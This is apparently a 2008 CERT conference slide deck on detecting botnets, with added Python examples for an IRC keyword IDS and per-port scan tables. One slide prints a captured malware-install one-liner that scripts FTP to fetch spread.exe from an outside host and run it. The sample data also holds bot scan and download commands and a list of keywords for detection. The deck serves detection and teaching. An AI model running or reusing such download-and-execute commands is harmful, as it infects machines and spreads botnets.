Botnet Detection and Network Security Alert
Tao JING, jingtao@cstnet.cn, CSTCERT, CNIC, (+86)-010-58812898
CANS 2008, Indiana University, 2008-10-21
China Science & Technology Network Computer Emergency Response Team

Agenda
• About CSTCERT
• About Botnet
• Network Security Alert
• Future work
CSTCERT Overview
• CSTCERT (China Science and Technology Network Computer Emergency Response Team) was founded in 2002.
• CSTCERT is supervised by CSTNET.
• Services:
  • Incident handling, including attacks, complaints, abnormal traffic detection and other related security incidents
  • Research and development
  • Emergency response
  • Security training
• Web: http://cert.cstnet.cn, Tel: +86-010-58812935, E-mail: cert@cstnet.cn

Our work
• From 2007.9 to 2008.9 we handled 266 security events:
  • security incidents: 205
  • security complaints: 61

The security situation is very serious! Why?
• You can become a hacker very easily:
  • Know a little
  • Search for hacking methods on the Internet
  • Many people share their hacking tools
  • If you are willing to pay some money, someone will teach you hacking techniques
About Botnet
• A botnet is a collection of computers, connected to the Internet, that interact to accomplish some distributed task.
• "Botnet" typically refers to such a system designed and used for illegal purposes.
• The compromised machines are referred to as drones or zombies; the malicious software running on them is called a "bot".
From: www.shadowserver.org

What can a botnet cause? ...

How can we find botnets?
• Active way:
  • Network protocol analysis
    • IRC
    • Monitor some special TCP ports (135/139/445/1433/22/2967 ...)
  • Check C&C (Command and Control) server address updates from the Internet
    • http://www.cyber-ta.org/
    • http://www.shadowserver.org
• Passive way:
  • Honeypot
Main characteristics of a botnet
• IRC messages
  • Port scan commands: advscan, asc ...
  • File download command: download
  • Others: ping/pong, join, mode ...
• Scanned TCP ports: 135/139/445/1433/22/2967
• Vulnerabilities that botnets usually exploit
  • Weak passwords (SSH/MS-SQL/Windows)
  • Overflow vulnerabilities (MS-SQL/Windows/software)

How the host was controlled, method 1: sometimes via a scan control command

How the host was controlled, method 2: sometimes by installing malware
C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe
ftp> open spreadem.nowslate1703.info 21
Connected to spreadem.nowslate1703.info.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 73 of 200 allowed.
220-Local time is now 00:15. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 2 minutes of inactivity.
ftp> user spread baby
331 User spread OK. Password required
230-User spread has group access to: spread
230 OK. Current restricted directory is /
ftp> binary
200 TYPE is now 8-bit binary
ftp> get
Remote file spread.exe
Local file spread.exe
200 PORT command successful
150-Connecting to port 1555
150 83.1 kbytes to download
226-File successfully transferred
226 0.750 seconds (measured here), 110.70 Kbytes per second
ftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 84 kbytes.
221 Logout.
C:\Documents and Settings\jackie>
Network security alert - IDS/IPS rules
• For port scans: match the IRC command words the bots use, e.g. asc/advscan
• For network communication over IRC: PING/PONG, JOIN, PRIVMSG ...

Rules for IDS
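The two rule families on the slides (bot command words inside IRC messages, and the IRC protocol verbs themselves) can be tested against reassembled traffic with a small Python sensor. The following is an added example written for this page, not the presenter's IDS rules or a capture from CSTCERT: it parses IRC lines, raises an alert when a PRIVMSG carries one of the scan or download keywords the slides name, and separately counts IRC verbs so that a stream on a non-standard port can still be recognised as IRC by protocol analysis. The sample lines, the nick "herder", the host "example.invalid" and the command-prefix characters ".!$" are constructed assumptions.

```python
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of IRC traffic, as a passive sensor would reassemble it
# from a TCP stream (not captured data from the presentation).
SAMPLE_IRC_LINES = [
    "PING :irc.example.test",
    "PONG :irc.example.test",
    "JOIN #botchan botkey",
    ":alice!a@host PRIVMSG #chat :hi all, lunch at 12?",
    ":herder!h@host PRIVMSG #botchan :.advscan lsass 200 5 0 -r -s",
    ":herder!h@host PRIVMSG #botchan :.asc dcom135 100 3 0 -b",
    ":herder!h@host PRIVMSG #botchan :.download http://example.invalid/spread.exe spread.exe 1",
    ":herder!h@host MODE #botchan +m",
]

# Command words named on the slides: scan commands and the download command.
SCAN_COMMANDS = {"asc", "advscan"}
DOWNLOAD_COMMANDS = {"download"}
# IRC protocol verbs the slides list as the C&C chatter to look for.
IRC_CONTROL_VERBS = {"PING", "PONG", "JOIN", "MODE", "PRIVMSG"}
# Characters bots often put in front of a command word (assumption).
COMMAND_PREFIXES = ".!$"


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str]
    trailing: Optional[str]


@dataclass
class Alert:
    line_no: int
    rule: str
    keyword: str
    target: str            # second word of the command (exploit name or URL)
    source: Optional[str]  # IRC nick that issued the command


def parse_irc(line: str) -> Optional[IrcMessage]:
    """Split one IRC line into prefix, verb, middle params and trailing text."""
    rest = line.strip()
    prefix = None
    if rest.startswith(":"):
        prefix, _, rest = rest[1:].partition(" ")
    trailing = None
    if " :" in rest:
        rest, _, trailing = rest.partition(" :")
    parts = rest.split()
    if not parts:
        return None
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing)


def bot_keyword(msg: IrcMessage) -> Optional[str]:
    """Return the bot command word carried in a PRIVMSG, or None."""
    if msg.command != "PRIVMSG" or not msg.trailing:
        return None
    words = msg.trailing.split()
    if not words:
        return None
    word = words[0].lstrip(COMMAND_PREFIXES).lower()
    if word in SCAN_COMMANDS or word in DOWNLOAD_COMMANDS:
        return word
    return None


def scan_lines(lines) -> List[Alert]:
    """Keyword rules: one alert per PRIVMSG that carries a bot command."""
    alerts = []
    for no, line in enumerate(lines, 1):
        msg = parse_irc(line)
        if msg is None:
            continue
        word = bot_keyword(msg)
        if word is None:
            continue
        words = msg.trailing.split()
        target = words[1] if len(words) > 1 else ""
        rule = "irc-bot-scan-command" if word in SCAN_COMMANDS else "irc-bot-download-command"
        nick = msg.prefix.split("!")[0] if msg.prefix else None
        alerts.append(Alert(no, rule, word, target, nick))
    return alerts


def irc_verb_counts(lines) -> Counter:
    """Protocol rule: count IRC control verbs seen in a stream."""
    counts = Counter()
    for line in lines:
        msg = parse_irc(line)
        if msg and msg.command in IRC_CONTROL_VERBS:
            counts[msg.command] += 1
    return counts


def looks_like_irc(lines, min_distinct_verbs: int = 3) -> bool:
    """A stream showing several distinct IRC verbs is IRC, whatever the port."""
    return len(irc_verb_counts(lines)) >= min_distinct_verbs


if __name__ == "__main__":
    for a in scan_lines(SAMPLE_IRC_LINES):
        print(f"line {a.line_no}: {a.rule} keyword={a.keyword} target={a.target} from={a.source}")
    print("IRC verbs:", dict(irc_verb_counts(SAMPLE_IRC_LINES)), "is IRC:", looks_like_irc(SAMPLE_IRC_LINES))
```

The keyword rules fire only on PRIVMSG payloads, so ordinary channel chatter that happens to mention "download" mid-sentence does not trigger them; the protocol counter is the check to pair with the port-based monitoring on the earlier slide, since a C&C channel on a port other than 6667 still speaks PING/PONG/JOIN/PRIVMSG.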
Network security alert - Network traffic data analysis
• We can build a simple mathematical model that describes network traffic data by a numerical analysis method (the NTNA model)

Data of tcp 1433 scan
  Src_ip1   Count_1   Dst_ipsum_1
  Src_ip2   Count_2   Dst_ipsum_2
  ...       ...       ...
  Src_ipn   Count_n   Dst_ipsum_n
Data of tcp 22 scan
  ...
Data of other port scans
  ...

NTNA model in practice
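The per-port table on the slide (one row per source IP with its connection count and the number of distinct destination IPs it touched) can be built directly from flow records. The following is an added example written for this page, not the NTNA model code used by CSTCERT: it reduces constructed connection attempts to the Src_ip / Count / Dst_ipsum rows for each monitored port from the slides and then separates scanners from busy legitimate clients by their fan-out, which is the quantity a single "count" column cannot distinguish. The flow records, the 10.x.x.x addresses and the fan-out threshold of 20 destinations are constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# TCP ports named on the slides as the ones botnets scan.
MONITORED_PORTS = (135, 139, 445, 1433, 22, 2967)


@dataclass(frozen=True)
class Flow:
    """One connection attempt (a netflow record reduced to the fields needed)."""
    src_ip: str
    dst_ip: str
    dst_port: int


@dataclass
class ScanRow:
    """One row of the per-port table: Src_ip_i, Count_i, Dst_ipsum_i."""
    src_ip: str
    count: int       # Count_i: connection attempts from this source
    dst_ipsum: int   # Dst_ipsum_i: distinct destination IPs the source touched


def build_port_table(flows: Iterable[Flow], port: int) -> List[ScanRow]:
    """Aggregate all attempts towards one port into the slide's table."""
    attempts: Dict[str, int] = defaultdict(int)
    targets: Dict[str, Set[str]] = defaultdict(set)
    for f in flows:
        if f.dst_port != port:
            continue
        attempts[f.src_ip] += 1
        targets[f.src_ip].add(f.dst_ip)
    rows = [ScanRow(s, attempts[s], len(targets[s])) for s in attempts]
    rows.sort(key=lambda r: (r.dst_ipsum, r.count), reverse=True)
    return rows


def build_ntna_tables(flows: Iterable[Flow]) -> Dict[int, List[ScanRow]]:
    """One table per monitored port ("Data of tcp 1433 scan", "Data of tcp 22 scan", ...)."""
    flows = list(flows)
    return {p: build_port_table(flows, p) for p in MONITORED_PORTS}


def flag_scanners(rows: List[ScanRow], min_dst_ips: int = 20) -> List[str]:
    """A scanner fans out to many destinations; a busy legitimate client
    repeats connections to one or a few. The threshold is an assumption."""
    return [r.src_ip for r in rows if r.dst_ipsum >= min_dst_ips]


def constructed_flows() -> List[Flow]:
    """Constructed input: two sweeps, one chatty client and some SMB noise."""
    flows = []
    # Source sweeping a /24 on MS-SQL port 1433: 50 attempts, 50 distinct hosts.
    for i in range(1, 51):
        flows.append(Flow("10.0.0.5", f"10.1.0.{i}", 1433))
    # Legitimate client reconnecting to one SQL server: 30 attempts, 1 host.
    for _ in range(30):
        flows.append(Flow("10.0.0.9", "10.1.0.7", 1433))
    # Password-guessing sweep across 25 hosts on SSH port 22.
    for i in range(1, 26):
        flows.append(Flow("10.0.0.7", f"10.2.0.{i}", 22))
    # Background SMB traffic to a single file server on port 445.
    for _ in range(5):
        flows.append(Flow("10.0.0.12", "10.1.0.20", 445))
    return flows


def report(flows: Iterable[Flow]) -> Dict[int, List[str]]:
    """Flagged sources per port, for ports that saw any traffic at all."""
    return {p: flag_scanners(rows) for p, rows in build_ntna_tables(flows).items() if rows}


if __name__ == "__main__":
    for port, rows in build_ntna_tables(constructed_flows()).items():
        if not rows:
            continue
        print(f"Data of tcp {port} scan")
        for r in rows:
            print(f"  {r.src_ip:15} Count={r.count:4} Dst_ipsum={r.dst_ipsum:4}")
        print("  flagged:", flag_scanners(rows))
```

The sort key puts the widest fan-out first, so the top rows of each table are the candidates an analyst reviews; on real netflow the same aggregation is run per time window, and the "accuracy amendment" and netflow extension listed under future work would adjust the threshold and the window rather than the table layout.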
Future work
• Botnet research
• Monitoring and countermeasures for large-scale network worms
• Some improvements to the NTNA model
  • Accuracy amendment
  • Extension to larger-scale network traffic data (netflow)
  • Data mining

Thank you!
jingtao@cstnet.cn
(+86)-010-58812898